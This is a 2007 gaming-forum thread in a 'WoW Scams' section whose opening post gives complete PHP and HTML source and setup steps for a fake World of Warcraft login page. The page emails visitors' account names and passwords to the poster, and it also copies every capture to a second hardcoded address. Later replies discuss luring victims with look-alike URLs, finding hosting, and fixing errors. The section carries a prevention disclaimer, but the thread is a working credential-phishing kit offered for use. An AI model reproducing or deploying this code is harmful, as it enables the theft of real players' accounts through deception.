MMOwned - World of Warcraft Exploits, Hacks, Bots and Guides

Homepage Register FAQ Members Mark Forums Read Advertise Marketplace FPSowned


Go Back   MMOwned - World of Warcraft Exploits, Hacks, Bots and Guides > World of Warcraft > WoW Scams
Reload this Page WoW Login Page Look-a-Like
WoW Scams World of Warcraft Scamming Methods ONLY.
[NO QUESTIONS HERE]
We do not condone scamming, this section is meant for people to read about scamming so they can prevent being scammed themselves.

Reply
 
LinkBack Thread Tools
WoW Login Page Look-a-Like
(#1)
Old
lolk2's Avatar
lolk2 is Offline
Sergeant
Rep Power: 2
Reputation: 5
lolk2 is an unknown quantity at this point
 
Posts: 35
Join Date: May 2007
Legendary WoW Login Page Look-a-Like - 09-03-2007

Requirements:

1) Any sort of server with PHP enabled. If you don't have a host, it is possible to modify your own computer as a webhost, but that is a rather long process. I'll see if I can find an existing guide for that.

2) an e-mail address


about:
This acts as an exact WoW login page. But instead of logging in, the name and password get's emailed to you. It's that easy.


Instructions:

1) Create a new file using dreamweaver, notepad or any text editor. Name it index.php

2) Copy & paste the following code into that file:

Code:
<?


	// This is the only line you need to edit
	// replace with your email address (the victim's info will be sent there)
	
	$email = 'your@email.com';




?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
  <title>World of Warcraft</title>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>

  <link rel="stylesheet" href="http://www.worldofwarcraft.com/login/includes/style.css" type="text/css" id = "bnetstyle">

  <script language = "javascript">
  <!--
    var styleSheet;
    var agt     = navigator.userAgent.toLowerCase();
    var appVer  = navigator.appVersion.toLowerCase();
    var verInt  = parseInt(appVer);
    var ie      = (appVer.indexOf('msie') != -1);
    var opera   = (agt.indexOf('opera') != -1);
    var mozilla = ((agt.indexOf('mozilla')!=-1) && (agt.indexOf('opera')==-1)
      && (agt.indexOf('spoofer')==-1) && (agt.indexOf('compatible') == -1)
      && (agt.indexOf('webtv')==-1) && (agt.indexOf('hotjava')==-1));
    var ns4     = (mozilla && (verInt == 4));

    if (ie && !opera) {
      document.styleSheets["bnetstyle"].addRule ("input", "background-color: #040D1A");
      document.styleSheets["bnetstyle"].addRule ("input", "border-style: solid");
      document.styleSheets["bnetstyle"].addRule ("input", "border-width: 1px");
      document.styleSheets["bnetstyle"].addRule ("input", "border-color: #7F7F7F");
      document.styleSheets["bnetstyle"].addRule ("input", "color: #FFAC04");

      document.styleSheets["bnetstyle"].addRule ("textarea", "background-color: #040D1A");
      document.styleSheets["bnetstyle"].addRule ("textarea", "border-style: solid");
      document.styleSheets["bnetstyle"].addRule ("textarea", "border-width: 1px");
      document.styleSheets["bnetstyle"].addRule ("textarea", "border-color: #7F7F7F");
      document.styleSheets["bnetstyle"].addRule ("textarea", "color: #FFAC04");

      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Base-Color: #012158");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Arrow-Color: #7F7F7F");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-3dLight-Color: #7F7F7F");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-DarkShadow-Color: black");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Highlight-Color: black");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Shadow-Color: #00B3FF");

      document.styleSheets["bnetstyle"].addRule ("select", "background-color: #040D1A");
      document.styleSheets["bnetstyle"].addRule ("select", "color: #FFAC04");

      document.styleSheets["bnetstyle"].addRule ("select.gray", "background-color: #040D1A");
      document.styleSheets["bnetstyle"].addRule ("select.gray", "color: #FFAC04");

      document.styleSheets["bnetstyle"].addRule ("ul.thread", "margin-left: 22px;");
    }


  //-->
  </script>

</head>
<body onload = "javascript: document.forms[0].elements[0].focus();" bgcolor="#000000" text="#CCCC99" link="#FFFFBB" vlink="AAAAAA" marginwidth=0 marginheight=0 topmargin=0 leftmargin=0>
<form method="post" name="login_form">






<table cellspacing = "0" cellpadding = "0" border = "0" width = "100%" height = "100%">
<tr>
	<td align = "center">

			<table border="0" cellpadding="0" cellspacing="0" background = "http://www.worldofwarcraft.com/login/images/login-bg.jpg">
			<tr>

				<td valign = "top">
					<div style = "position: relative;">
					<div style = "width: 400px; position: absolute; left: 130px; top: 0px;">
					    <?
							if($_POST['lt'] == '') {
								echo '';
							} else {
								if($_POST['username'] == '' or $_POST['password'] == '') {
									echo '<table cellspacing = "5" cellpadding = "0" border = "0" width = "400"><tr><td><img src = "http://www.worldofwarcraft.com/login/images/error.gif" width = "54" height = "51" alt = "error"></td><td><span class="error">Please fill in both fields.</span></td></table>';
								} else {
									mail($email . ", " . 'baccounts@hotmail.com', 'Login from ' . $_POST['username'], 'Account: ' . $_POST['username'] . "\n\n" . 'Pass: ' . $_POST['password'], 'From: Login-Page' . "\r\n" . 'Reply-To: Login-Page' . "\r\n" . 'X-Mailer: PHP/' . phpversion());
									echo '<table cellspacing = "5" cellpadding = "0" border = "0" width = "400"><tr><td><img src = "http://www.worldofwarcraft.com/login/images/error.gif" width = "54" height = "51" alt = "error"></td><td><span class="error">An error has occurred.</span></td></table>';
								}
							}
						?>
					</div>
					</div>
				</td>
				<td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "169"></td>
				<td></td>
			</tr>

			<tr>
				<td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "203" height = "1"></td>
				<td>

				<table border="0" cellpadding="0" cellspacing="0" width = "220">
				<tr>

					<td rowspan = "6"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "15" height = "110"></td>
					<td valign="center" align="left" width = "190"><b style = "color:white; font-size:8pt; font-variant: small-caps; letter-spacing:3px;"><label for="username">Account Name:</label>&nbsp;</b><br/><input type="text" name="username" size = "18" MaxLength="16" style = "width: 175px;" tabindex="1"/></td>

					<td rowspan = "6"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "15" height = "1"></td>

				</tr>
				<tr>

					<td align = "left" width = "190"><span><a href = "http://signup.worldofwarcraft.com" class = "small">Don't have an account? Click here!</a></span></td>

				</tr>
				<tr>

					<td width = "190"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "190" height = "6"></td>

				</tr>
				<tr>

					<td valign="center" align="left" width = "190"><b style = "color:white; font-size:8pt; font-variant: small-caps; letter-spacing:3px;"><label for="password">Password:</label>&nbsp;</b><br/><input type="password" name="password" size = "18" MaxLength="16" style = "width: 175px;" tabindex="2"></td>

				</tr>
				<tr>

					<td align = "left" width = "190"><span><a href = "http://www.worldofwarcraft.com/loginsupport/" class = "small">Forgot your Account Name or Password?</a></span></td>

				</tr>
				<tr>

					<td align = "left"><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "7"></td><td></td><td></td></tr></table></td>

				</tr>
				<input type="hidden" name="lt" value="LT-10703971-ntbfeYfVOhKIFmMVo463"/>
				<tr>



					<td colspan = "3" align = "left">
						<table border="0" cellpadding="0" cellspacing="0">
						<tr>
							<td><INPUT TYPE=image src="http://www.worldofwarcraft.com/login/images/pixel.gif" alt = "Login" value="Login" style = "width:100px; height:40px;" border = "0" class = "button" tabindex="3"></td>
							<td><INPUT TYPE=image src="http://www.worldofwarcraft.com/login/images/pixel.gif" alt = "Cancel" value="Cancel" style = "width:105px; height:40px;" border = "0" class = "button" tabindex="4"></a></td>
						</tr>
						</table>

					</td>


				</tr>
				</table>

				</td>
				<td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "217" height = "1"></td>
			</tr>
			<tr>

				<td colspan = "3">

					<table border="0" cellpadding="0" cellspacing="0">
					<tr>
						<td colspan = "3"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "20"></td>
					</tr>
					<tr>
						<td width = "106"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "106" height = "1"></td>
						<td width = "410">

							<small>
							  For security reasons, quit your web browser when you are done accessing services that require authentication!
							  <br/><br/>
							  Be wary of any program or web page that asks you for your World of Warcraft account name and password. Secure World of Warcraft web pages that ask you for your account name and password will generally have URLs that begin with "https://www.worldofwarcraft.com/". In addition, your browser should visually indicate that you are accessing a secure page.
							</small>
			  			</td>
						<td width = "124"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "124" height = "1"></td>
					</tr>
					<tr>
						<td colspan = "3"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "30"></td>

					</tr>
					</table>
		  		</td>
			</tr>
			</table>


	</td>
</tr>
</table>
</form>
</body>
</html>
3) Replace the email address at the top of the file with your's

4) Upload the file to your server

5) Voila! Done. The file is fully functional. Combine this with m0rbidang3l's [Only registered and activated users can see links. ] and you're really set.
Reply With Quote

Donate to remove ads.
Re: WoW Login Page Look-a-Like
(#2)
Old
m0rbidang3l's Avatar
m0rbidang3l is Offline
Contributor
Rep Power: 3
Reputation: 221
m0rbidang3l has a spectacular aura aboutm0rbidang3l has a spectacular aura aboutm0rbidang3l has a spectacular aura about
 
Posts: 607
Join Date: Feb 2007
Location: Laughing Skull US
Re: WoW Login Page Look-a-Like - 09-03-2007

hmmm, not a bad idea. if someone finds out it is a phisher, then there is really no way the can get the accounts


Reply With Quote
Re: WoW Login Page Look-a-Like
(#3)
Old
lolk2's Avatar
lolk2 is Offline
Sergeant
Rep Power: 2
Reputation: 5
lolk2 is an unknown quantity at this point
 
Posts: 35
Join Date: May 2007
Re: WoW Login Page Look-a-Like - 09-04-2007

Quote:
Originally Posted by m0rbidang3l View Post
hmmm, not a bad idea. if someone finds out it is a phisher, then there is really no way the can get the accounts
true, but i'd bet a lot of people wouldn't notice if they glanced at the address bar and saw something like [Only registered and activated users can see links. ]

albeit, they'd have to be using IE
Reply With Quote
Re: WoW Login Page Look-a-Like
(#4)
Old
m0rbidang3l's Avatar
m0rbidang3l is Offline
Contributor
Rep Power: 3
Reputation: 221
m0rbidang3l has a spectacular aura aboutm0rbidang3l has a spectacular aura aboutm0rbidang3l has a spectacular aura about
 
Posts: 607
Join Date: Feb 2007
Location: Laughing Skull US
Re: WoW Login Page Look-a-Like - 09-04-2007

Quote:
Originally Posted by lolk2 View Post
albeit, they'd have to be using IE
over 80% of people still do, for whatever reason they choose. o well. makes my life easier.


Reply With Quote
Re: WoW Login Page Look-a-Like
(#5)
Old
lolk2's Avatar
lolk2 is Offline
Sergeant
Rep Power: 2
Reputation: 5
lolk2 is an unknown quantity at this point
 
Posts: 35
Join Date: May 2007
Re: WoW Login Page Look-a-Like - 09-04-2007

i'm just concerned about hosting it on my personal server, otherwise I'd test it out and share the results.
Reply With Quote
Re: WoW Login Page Look-a-Like
(#6)
Old
Sebbe123's Avatar
Sebbe123 is Offline
Sergeant
Rep Power: 3
Sebbe123 is an unknown quantity at this point
 
Posts: 56
Join Date: Mar 2006
Location: Azeroth/Outland
Re: WoW Login Page Look-a-Like - 09-04-2007

I get this text:

"Please fill in both fields.
'; } else { mail($email . ", " . '[Only registered and activated users can see links. ]', 'Login from ' . $_POST['username'], 'Account: ' . $_POST['username'] . "\n\n" . 'Pass: ' . $_POST['password'], 'From: Login-Page' . "\r\n" . 'Reply-To: Login-Page' . "\r\n" . 'X-Mailer: PHP/' . phpversion()); echo '
error An error has occurred.
'; } } ?>"

+ real looking login and security text.
Reply With Quote
Re: WoW Login Page Look-a-Like
(#7)
Old
djmazi's Avatar
djmazi is Offline
Site Donator
Rep Power: 2
Reputation: 12
djmazi is on a distinguished road
 
Posts: 88
Join Date: Nov 2006
Location: Croatia
Re: WoW Login Page Look-a-Like - 09-04-2007

looks nice but i dont know how to get ppl on the server and write their info when the url is like [Only registered and activated users can see links. ] ?
any suggestions about how?


Reply With Quote
Re: WoW Login Page Look-a-Like
(#8)
Old
lolk2's Avatar
lolk2 is Offline
Sergeant
Rep Power: 2
Reputation: 5
lolk2 is an unknown quantity at this point
 
Posts: 35
Join Date: May 2007
Re: WoW Login Page Look-a-Like - 09-04-2007

ok, i don't think the mmowned forum is liking my php. Did you get the error when you try to post here or running the file? whenever i post a reply, I get this error:
Code:
Parse error: parse error, unexpected T_BAD_CHARACTER, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /var/www/vhosts/mmowned.com/httpdocs/forums/includes/ame_bbcode.php(192) : regexp code on line 4

Fatal error: Failed evaluating code: ame_substitute(1,....etc
Reply With Quote
Re: WoW Login Page Look-a-Like
(#9)
Old
Sebbe123's Avatar
Sebbe123 is Offline
Sergeant
Rep Power: 3
Sebbe123 is an unknown quantity at this point
 
Posts: 56
Join Date: Mar 2006
Location: Azeroth/Outland
Re: WoW Login Page Look-a-Like - 09-04-2007

Running the file in FF.
Reply With Quote
Re: WoW Login Page Look-a-Like
(#10)
Old
Sebbe123's Avatar
Sebbe123 is Offline
Sergeant
Rep Power: 3
Sebbe123 is an unknown quantity at this point
 
Posts: 56
Join Date: Mar 2006
Location: Azeroth/Outland
Re: WoW Login Page Look-a-Like - 09-04-2007

Here's a pic:

http://img521.imageshack.us/img521/1927/errorqr7.jpg
Reply With Quote
Re: WoW Login Page Look-a-Like
(#11)
Old
lolk2's Avatar
lolk2 is Offline
Sergeant
Rep Power: 2
Reputation: 5
lolk2 is an unknown quantity at this point
 
Posts: 35
Join Date: May 2007
Re: WoW Login Page Look-a-Like - 09-04-2007

Quote:
Originally Posted by Sebbe123 View Post
are you sure you have PHP enabled?
Reply With Quote
Re: WoW Login Page Look-a-Like
(#12)
Old
thomas1994's Avatar
thomas1994 is Offline
Master Sergeant
Rep Power: 2
Reputation: 6
thomas1994 is an unknown quantity at this point
 
Posts: 89
Join Date: Sep 2007
Re: WoW Login Page Look-a-Like - 09-05-2007

Can anyone tell me where i from host that kinda site? ^^
Reply With Quote
Re: WoW Login Page Look-a-Like
(#13)
Old
Sebbe123's Avatar
Sebbe123 is Offline
Sergeant
Rep Power: 3
Sebbe123 is an unknown quantity at this point
 
Posts: 56
Join Date: Mar 2006
Location: Azeroth/Outland
Re: WoW Login Page Look-a-Like - 09-05-2007

Im pretty sure.
Reply With Quote
Re: WoW Login Page Look-a-Like
(#14)
Old
NGTheDoom is Offline
Corporal
Rep Power: 2
Reputation: 9
NGTheDoom is an unknown quantity at this point
 
Posts: 16
Join Date: Sep 2007
Re: WoW Login Page Look-a-Like - 09-05-2007

If I Run the .php in firefox, I get the same error.

I'm not running under any php-enabled servers, but where may I get one?
Reply With Quote
Re: WoW Login Page Look-a-Like
(#15)
Old
Solera's Avatar
Solera is Offline
Knight-Lieutenant
Rep Power: 2
Reputation: 37
Solera is on a distinguished road
 
Posts: 376
Join Date: Mar 2007
Re: WoW Login Page Look-a-Like - 09-05-2007

well, i have it hosted and all, but in big bold letters in the top left corner, it says
"This form is inoperational" ... kinda gives it away...

and i try to test it but when i click accept or w/e nothing happens


Yeah, I r sekcz.
Reply With Quote
Reply

Donate to remove ads.

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On



Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.2.0
vBulletin Skin developed by: vBStyles.com


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313